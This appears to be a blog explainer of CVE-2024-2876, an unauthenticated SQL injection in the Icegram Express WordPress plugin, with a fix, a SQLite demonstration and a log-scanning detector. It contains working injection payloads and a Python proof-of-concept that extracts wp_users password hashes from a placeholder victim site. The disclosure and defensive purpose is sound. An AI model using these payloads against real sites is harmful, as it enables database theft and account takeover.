CVE-2024-2876 is a critical security vulnerability found in the popular “Email Subscribers by Icegram Express – Email Marketing, Newsletters, Automation for WordPress & WooCommerce” plugin. This plugin is widely used on WordPress websites to manage newsletter subscriptions and automate email campaigns.

This post breaks down what the vulnerability is, how it works, and why it is dangerous, with technical details and an illustrative code snippet. It is written in plain American English for easy reading.

What Is CVE-2024-2876?

CVE-2024-2876 is an unauthenticated SQL injection flaw present in all versions of the Email Subscribers plugin up to 5.7.14. It originates from insecure code in the run function of the IG_ES_Subscribers_Query class.

Key issue:
An attacker can supply a crafted value for a parameter the plugin reads from the request, and the plugin neither escapes that value nor runs the query through $wpdb->prepare() before splicing it into the SQL string. Anyone, including visitors who are not logged in, can therefore run SQL of their choosing against the site's WordPress database.

Why Is This Dangerous?

SQL injection is among the most severe web vulnerabilities. Successful abuse of this flaw lets an attacker read, and potentially modify, the contents of the WordPress database, and no account on the site is required.

Where’s the Vulnerable Code?

The vulnerable function is in the class:
IG_ES_Subscribers_Query

File:
icegram/lite/includes/classes/ig-es-query-subscribers.php

Inside, the run function takes a search value from the request and inserts it, unmodified, into a SQL query string. The examples below call that parameter subscribers_search; the name and the exact code are illustrative, since the real file is structured differently.

_(Note: This snippet is for education; the actual file structure may differ)_

global $wpdb;

// Vulnerable: the raw request value is concatenated straight into the SQL text
$search_term = $_GET['subscribers_search'];   // User input, neither sanitized nor escaped

$query = "SELECT * FROM {$wpdb->prefix}ig_es_subscribers WHERE email LIKE '%$search_term%'";
// No $wpdb->prepare(), no $wpdb->esc_like(): a quote in $search_term ends the string literal

$results = $wpdb->get_results( $query );

How Can It Be Exploited?

An attacker passes a crafted value for subscribers_search that contains SQL syntax, so the quote in the value closes the string the plugin opened and the rest of the value becomes part of the query.

Here is an example GET request. The payload is shown unencoded for readability; on the wire the quote is sent as %27 and each space as %20. The action name, like the parameter name, is illustrative. If the plugin exposes the search through an AJAX action registered with wp_ajax_nopriv_, as this example assumes, admin-ajax.php serves it to visitors who are not logged in, which is what makes the flaw reachable without an account.

GET /wp-admin/admin-ajax.php?action=ig_es_get_subscribers&subscribers_search=' OR 1=1 -- -

This turns the original query into

SELECT * FROM wp_ig_es_subscribers WHERE email LIKE '%' OR 1=1 -- -%'

Everything from "-- " onward, including the trailing %', is a comment (MySQL requires whitespace after the two dashes, which is why the payload ends in "-- -"), and OR 1=1 makes the WHERE clause true for every row, so the entire subscriber table comes back.

Extract More Data

With more work, an attacker can UNION a second SELECT onto the query to pull rows from other tables, for example admin credentials or plugin configuration. The UNION must return the same number of columns as the original SELECT (five is illustrative here; in practice the count is found by trial, for instance by appending ORDER BY n until the query errors). WordPress runs on MySQL/MariaDB, so MySQL syntax is what matters:

Example for MySQL (simplified)

subscribers_search=' UNION SELECT user_login,user_pass,1,1,1 from wp_users -- -

This returns WordPress usernames and password hashes from the wp_users table (wp_ is the default table prefix and may differ). The hashes are salted, so the attacker still has to crack them offline before they are usable as credentials, but they are the same hashes a full database dump would expose.
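To see the two payloads above actually change the result set, here is an added example that is not code from this page or from the plugin. It reproduces the vulnerable string-building pattern against an in-memory SQLite database with constructed sample tables, and puts the parameterised version beside it. The table layout, the sample rows and the hash strings are invented for the demo, and SQLite stands in for the MySQL/MariaDB that WordPress really uses; it is the pattern, not the exact dialect, that carries over.

```python
import sqlite3

# Constructed sample data standing in for wp_ig_es_subscribers and wp_users.
# Column layout, rows and hash strings are invented for this demo; the real
# plugin schema and real WordPress hashes differ.
SUBSCRIBERS = [
    (1, "alice@example.com", "Alice", "subscribed", "2024-01-01"),
    (2, "bob@example.com", "Bob", "unsubscribed", "2024-02-01"),
    (3, "carol@example.com", "Carol", "subscribed", "2024-03-01"),
]
USERS = [
    (1, "admin", "$P$BdemoHashNotReal0000000000000"),
    (2, "editor", "$P$BdemoHashNotReal1111111111111"),
]

# The two payloads from the text above.
TAUTOLOGY_PAYLOAD = "' OR 1=1 -- -"
UNION_PAYLOAD = "' UNION SELECT user_login, user_pass, 1, 1, 1 FROM wp_users -- -"


def make_db():
    """In-memory SQLite stand-in for the WordPress database."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE wp_ig_es_subscribers "
        "(id INTEGER, email TEXT, name TEXT, status TEXT, created TEXT)"
    )
    conn.executemany("INSERT INTO wp_ig_es_subscribers VALUES (?, ?, ?, ?, ?)", SUBSCRIBERS)
    conn.execute("CREATE TABLE wp_users (ID INTEGER, user_login TEXT, user_pass TEXT)")
    conn.executemany("INSERT INTO wp_users VALUES (?, ?, ?)", USERS)
    return conn


def vulnerable_search(conn, search_term):
    """Same mistake as the plugin snippet: the raw term becomes part of the SQL text."""
    # SQLite treats "--" as a comment even without a trailing space; MySQL needs the space.
    query = f"SELECT * FROM wp_ig_es_subscribers WHERE email LIKE '%{search_term}%'"
    return conn.execute(query).fetchall()


def escape_like(term):
    """Python equivalent of $wpdb->esc_like(): make %, _ and backslash literal in a LIKE pattern."""
    return term.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")


def safe_search(conn, search_term):
    """Parameterised equivalent of $wpdb->prepare(): the term is bound as data, never as SQL."""
    pattern = "%" + escape_like(search_term) + "%"
    return conn.execute(
        "SELECT * FROM wp_ig_es_subscribers WHERE email LIKE ? ESCAPE '\\'",
        (pattern,),
    ).fetchall()


def demo():
    conn = make_db()
    return {
        "benign": len(vulnerable_search(conn, "alice")),                    # 1 matching subscriber
        "tautology_rows": len(vulnerable_search(conn, TAUTOLOGY_PAYLOAD)),  # whole table
        "union_rows": vulnerable_search(conn, UNION_PAYLOAD),               # subscribers + wp_users rows
        "safe_tautology": safe_search(conn, TAUTOLOGY_PAYLOAD),             # no rows
        "safe_union": safe_search(conn, UNION_PAYLOAD),                     # no rows
        "safe_wildcard": safe_search(conn, "%"),                            # no rows: % is literal
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

The UNION rows come back interleaved with genuine subscriber rows because both halves have five columns, which is exactly why the attacker has to get the column count right. The last entry in demo() shows the part prepare() alone does not cover: a bare % in the search term would still match every row unless esc_like() has made it literal.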

References

- Wordfence Advisory: CVE-2024-2876
- NVD Entry for CVE-2024-2876
- WPScan Advisory
- Icegram Express Official Site

Simple Proof-of-Concept Exploit (Read-Only)

Warning: Do not use this code against servers you do not own or have explicit, written permission to test!

import requests

# Illustrative target; the action and parameter names follow the examples above
target = 'https://victim-site.com/wp-admin/admin-ajax.php'
payload = "' UNION SELECT user_login, user_pass, 1, 1, 1 FROM wp_users -- -"

params = {
    'action': 'ig_es_get_subscribers',
    'subscribers_search': payload
}

# requests URL-encodes the payload (quote -> %27, spaces -> %20) before sending it
r = requests.get(target, params=params, timeout=10)
print(r.status_code)
print(r.text)   # On a vulnerable site the response may include user_login/user_pass values from wp_users

How To Fix

Upgrade the plugin:
Icegram Express patched this in v5.7.15; every release up to and including 5.7.14 is affected.
Download Latest Version – WordPress.org

Technical Fix:

Always use $wpdb->prepare() for SQL that carries user-provided data, and escape LIKE wildcards separately with $wpdb->esc_like(), because prepare() quotes the value but does not neutralise % and _:

global $wpdb;

// Unslash and sanitize the request value before it goes anywhere near SQL
$search_term = isset( $_GET['subscribers_search'] ) ? sanitize_text_field( wp_unslash( $_GET['subscribers_search'] ) ) : '';

// esc_like() makes % and _ literal; prepare() binds the whole pattern as a quoted string
$query = $wpdb->prepare(
    "SELECT * FROM {$wpdb->prefix}ig_es_subscribers WHERE email LIKE %s",
    '%' . $wpdb->esc_like( $search_term ) . '%'
);
$results = $wpdb->get_results( $query );
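Updating closes the hole; whether anyone tried it against your site before the update is a separate question a responder will ask. The following added example (not code from this page or from the plugin) scans Apache-style access log lines for requests to admin-ajax.php whose query parameters, once percent-decoded, carry the injection syntax used above. The log lines are constructed for the demo with addresses from the documentation ranges, and the action and parameter names are the same illustrative ones as in the rest of this post.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache combined-log lines for the demo; not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [02/May/2024:18:01:02 +0000] "GET /wp-admin/admin-ajax.php?action=ig_es_get_subscribers&subscribers_search=%27%20OR%201%3D1%20--%20- HTTP/1.1" 200 5120 "-" "python-requests/2.31.0"',
    '198.51.100.4 - - [02/May/2024:18:02:10 +0000] "GET /wp-admin/admin-ajax.php?action=ig_es_get_subscribers&subscribers_search=alice HTTP/1.1" 200 310 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [02/May/2024:18:03:44 +0000] "GET /wp-admin/admin-ajax.php?action=ig_es_get_subscribers&subscribers_search=%27%20UNION%20SELECT%20user_login%2Cuser_pass%2C1%2C1%2C1%20from%20wp_users%20--%20- HTTP/1.1" 200 9000 "-" "python-requests/2.31.0"',
    '192.0.2.9 - - [02/May/2024:18:04:00 +0000] "GET /wp-admin/admin-ajax.php?action=ig_es_get_subscribers&subscribers_search=union%20station HTTP/1.1" 200 310 "-" "Mozilla/5.0"',
]

# Apache combined log: ip, identd, user, [time], "METHOD target PROTO", status, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Markers of the injection syntax used in this post: a quote that closes the
# string literal followed by a boolean operator, UNION ... SELECT, or a SQL comment.
# Plain words such as "union station" do not match.
SQLI_RE = re.compile(r"""(?ix)
      '\s*(?:or|and)\b
    | \bunion\s+(?:all\s+)?select\b
    | --[\s-]
    | /\*
""")


def scan_line(line):
    """Return a finding dict for a suspicious admin-ajax request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if not parts.path.endswith("/wp-admin/admin-ajax.php"):
        return None
    # parse_qs percent-decodes, so %27 becomes the quote the regex is looking for
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        for value in values:
            if SQLI_RE.search(value):
                return {
                    "ip": m.group("ip"),
                    "time": m.group("time"),
                    "status": int(m.group("status")),
                    "param": name,
                    "value": value,
                }
    return None


def scan(lines):
    """Scan an iterable of log lines and return all findings in order."""
    return [f for f in map(scan_line, lines) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Two caveats before trusting the result. An access log only records the query string of GET requests, and admin-ajax calls are often POSTed with the parameters in the body, so an empty scan is not proof that nothing was attempted; a WAF or request-body log is needed for that. And a hit shows an attempt, not success: compare the response size of the flagged requests with a normal search (the 5120 and 9000 bytes in the sample are invented) and check the plugin version that was installed at that time.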

Conclusion

CVE-2024-2876 exposes sites running Email Subscribers by Icegram Express 5.7.14 or older to database disclosure, including user password hashes that can be cracked offline and then used to take over accounts. The flaw is easy to exploit and needs no login. The maintainers fixed it quickly in 5.7.15, so update as soon as possible.

Stay safe and keep your plugins updated!


Timeline

Published on: 05/02/2024 17:15:20 UTC
Last modified on: 06/04/2024 17:29:13 UTC